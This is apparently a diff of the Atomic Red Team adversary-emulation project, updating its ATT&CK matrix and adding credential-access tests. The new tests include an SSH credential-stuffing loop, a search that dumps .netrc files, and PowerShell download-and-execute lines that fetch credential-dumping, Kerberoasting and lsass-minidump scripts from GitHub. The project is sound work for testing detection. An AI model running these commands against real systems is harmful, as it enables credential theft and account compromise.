-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -15,12 +15,12 @@
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -35,7 +35,7 @@
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | [Remote Access Software](../../T1219/T1219.md) |  |
-|  |  | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Local Accounts](../../T1078.003/T1078.003.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -57,7 +57,7 @@
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -831,7 +831,72 @@ credential-access:
      x_mitre_contributors:
      - Diogo Fernandes
      - Anastasios Pingios
-    atomic_tests: []
+      identifier: T1110.004
+    atomic_tests:
+    - name: SSH Credential Stuffing From Linux
+      auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
+          [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
+          apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+'
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+    - name: SSH Credential Stuffing From MacOS
+      auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+          brew install hudochenkov/sshpass/sshpass
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
  T1552.001:
    technique:
      id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
@@ -965,6 +1030,20 @@ credential-access:
          type C:\Windows\Panther\Unattend\unattend.xml
        name: command_prompt
        elevation_required: true
+    - name: Find and Access Github Credentials
+      auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803
+      description: 'This test looks for .netrc files (which stores github credentials
+        in clear text )and dumps its contents if found.
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "for file in $(find / -name .netrc 2> /dev/null);do echo $file ;
+          cat $file ; done \n"
  T1555:
    technique:
      id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
@@ -1034,13 +1113,40 @@ credential-access:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
        cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
          Ignore

 '
        name: powershell
+    - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+        Credentials]
+      auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+          -UseBasicParsing); Get-PasswordVaultCredentials -Force   \n"
+    - name: Dump credentials from Windows Credential Manager With PowerShell [web
+        Credentials]
+      auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+          -UseBasicParsing); Get-CredManCreds -Force
+
+'
  T1555.003:
    technique:
      created: '2020-02-12T18:57:36.041Z'
@@ -1380,10 +1486,10 @@ credential-access:
      - Windows
      identifier: T1003.006
    atomic_tests:
-    - name: DCSync
+    - name: DCSync (Active Directory)
      auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
      description: |
-        Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
+        Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
        Works against a remote Windows Domain Controller using the replication protocol.
        Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
        [Reference](https://adsecurity.org/?p=1729)
@@ -1391,7 +1497,7 @@ credential-access:
      - windows
      input_arguments:
        domain:
-          description: Targeted domain
+          description: Targeted Active Directory domain
          type: string
          default: example.com
        user:
@@ -1859,10 +1965,10 @@ credential-access:
      - Windows
      identifier: T1558.001
    atomic_tests:
-    - name: Crafting golden tickets with mimikatz
+    - name: Crafting Active Directory golden tickets with mimikatz
      auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
      description: |
-        Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain.
+        Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
        This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
        The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
      supported_platforms:
@@ -1874,7 +1980,7 @@ credential-access:
          type: string
          default: S-1-5-21-DEFAULT
        domain:
-          description: Targeted domain FQDN
+          description: Targeted Active Directory domain FQDN
          type: string
          default: example.com
        account:
@@ -2233,6 +2339,7 @@ credential-access:
      - windows
      executor:
        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
          Invoke-Kerberoast | fl
        name: powershell
@@ -2415,11 +2522,15 @@ credential-access:
        'aureport --tty' or other audit.d reading tools to read the log output, which
        is binary.  Mac OS does not currently contain the pam_tty_audit.so library.
        \n"
-      prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+      dependencies:
+      - description: 'Checking if pam_tty_audit.so is installed

 '
-      get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
-        recompile, for this test to work"
+        prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+
+'
+        get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+          and recompile, for this test to work"

 '
      supported_platforms:
@@ -2746,6 +2857,7 @@ credential-access:
 '
        get_prereq_command: |
          $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
          if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
            Expand-Archive $zippath $parentpath\wce -Force
@@ -2787,6 +2899,7 @@ credential-access:

 '
        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
          Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
          New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -2841,6 +2954,7 @@ credential-access:

 '
        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
          Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
      executor:
@@ -2895,6 +3009,7 @@ credential-access:

 '
        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
          $request = [System.Net.WebRequest]::Create($url)
          $response = $request.GetResponse()
@@ -2978,10 +3093,9 @@ credential-access:
      supported_platforms:
      - windows
      executor:
-        command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
-          get-process lsass | Out-Minidump
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
        cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore

 '
@@ -3116,10 +3230,9 @@ credential-access:
        prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}

 '
-        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
-          -OutFile #{xordump_exe}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
      executor:
        command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
        cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
@@ -3930,8 +4043,9 @@ credential-access:
      - description: NPPSpy.dll must be available in local temp directory
        prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
